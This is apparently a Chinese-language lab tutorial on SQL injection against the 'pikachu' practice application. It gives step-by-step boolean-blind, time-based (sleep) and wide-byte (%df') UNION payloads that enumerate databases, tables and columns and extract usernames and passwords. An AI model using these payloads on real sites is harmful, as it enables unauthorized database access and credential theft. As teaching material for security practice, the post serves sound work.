SQL隱碼攻擊之常見注入的步驟④
SQL隱碼攻擊之常見注入的步驟④
盲注:(布林)
①判斷注入:name=kobe’ and 1=1 %23 正常, name=kobe’ and 1=2 報錯 存在注入
②通過length判斷資料庫的長度
name=kobe’ and length (database())>6 %23 正常,>7報錯 所以長度為7
③判斷資料庫第一位的ascii值
name=kobe’ and ascii(substr(database(),1,1))>111 正常 >112報錯 所以庫的第一位ascii值為112
④判斷資料表第一位的ascii值
name=kobe’ and ascii(substr((select table_name from information_schema.tables where table_schema=‘pikachu’ limit 0,1),1,1))>103%23 正常 , >104報錯 ascii值為104
⑤判斷欄位:與表類似
⑥判斷資料:
name=kobe’ and ascii(substr((select username from users limit 0,1 ),1,1)) >96 %23 正常, >97報錯 所以第一個username的ascii值為97
盲注(時間)
①判斷注入:kobe’ and sleep(5) 延時5秒後才顯示,存在注入
②通過ascii判斷資料庫
kobe’ and if(ascii(substr(database(),1,1))>111,sleep(6),1) 有延遲 >112 無延遲 第一位ascii為112
③爆資料表
kobe’ and if(ascii(substr((select table_name from information_schema.tables where table_schema=‘pikachu’ limit 0,1),1,1))>103,sleep(6),1)# 有延遲,>104無延遲 所以第一位ascii值為104
④爆資料列
kobe’ and if(ascii(substr((select column_name from information_schema.columns where table_name=‘users’ limit 0,1),1,1))>116,sleep(6),1)# 有延遲,>117無延遲 所以第一位ascii值為116
⑤爆資料
kobe’ and if(ascii(substr((select password from users limit 0,1),1,1))>100,sleep(3),1)# 有延遲, >101無延遲 所以第一位ascii值為101
寬位元組注入
①抓包
②判斷注入:在後面加%df’看是否報錯,報錯為寬位元組注入
③判斷列數:name=a%df’ order by 3 報錯,order by 2 無報錯 為2列
④爆資料庫:name=a%df’ union select 1,database()%23
⑤爆資料表:name=-a%df’union select table_name,2 from information_schema.tables where table_schema=database()%23
⑥爆資料列name=-a%df’union select column_name,2 from information_schema.columns where table_name=‘users’%23
⑦爆資料name=-a%df’union select concat(username,0x7e,password),2 from users%23
相關文章
- SQL隱碼攻擊-堆疊注入SQL
- SQL隱碼攻擊的原理及一般步驟SQL
- SQL隱碼攻擊之字元型和數字型注入SQL字元
- SQL隱碼攻擊 - 手工注入sqli-labsSQL
- SQL隱碼攻擊中二階注入原理SQL
- SQL隱碼攻擊原理——萬能密碼注入SQL密碼
- SQL隱碼攻擊SQL
- SQL隱碼攻擊(pikachu)SQL
- SQL隱碼攻擊方法SQL
- MYSQL SQL隱碼攻擊MySql
- WEB三大攻擊之—SQL隱碼攻擊與防護WebSQL
- SQL隱碼攻擊原理是什麼?如何防範SQL隱碼攻擊?SQL
- Java審計之SQL隱碼攻擊篇JavaSQL
- 【網路安全】什麼是SQL隱碼攻擊漏洞?SQL隱碼攻擊的特點!SQL
- SQL隱碼攻擊之二次注入(sql-lab第24關)SQL
- 封神臺 SQL隱碼攻擊 靶場 (貓舍)手動注入SQL
- SQL隱碼攻擊之二次,加解密,DNS等注入SQL解密DNS
- SQL隱碼攻擊導圖SQL
- SQL隱碼攻擊語句SQL
- pikachu-SQL隱碼攻擊SQL
- SQL隱碼攻擊總結SQL
- XSS與SQL隱碼攻擊SQL
- 軟體安全測試之SQL隱碼攻擊SQL
- DVWA-SQL Injection(SQL隱碼攻擊)SQL
- SQL隱碼攻擊速查表(下)與Oracle注入速查表SQLOracle
- 攻擊JavaWeb應用[4]-SQL隱碼攻擊[2]JavaWebSQL
- 攻擊JavaWeb應用[3]-SQL隱碼攻擊[1]JavaWebSQL
- SQL隱碼攻擊關聯分析SQL
- Mybatis如何防止SQL隱碼攻擊MyBatisSQL
- Nacos Derby SQL隱碼攻擊漏洞SQL
- MSSQL SQL隱碼攻擊 總結SQL
- Oracle SQL隱碼攻擊 總結OracleSQL
- SQL隱碼攻擊基礎原理SQL
- 【網路安全入門】SQL隱碼攻擊是什麼?SQL隱碼攻擊危害有哪些?SQL
- 常見的安全模型、攻擊模型和隱私需求模型
- 什麼是SQL隱碼攻擊(SQLi)SQL
- SQL隱碼攻擊讀寫檔案SQL
- Mura CMS processAsyncObject SQL隱碼攻擊漏洞ObjectSQL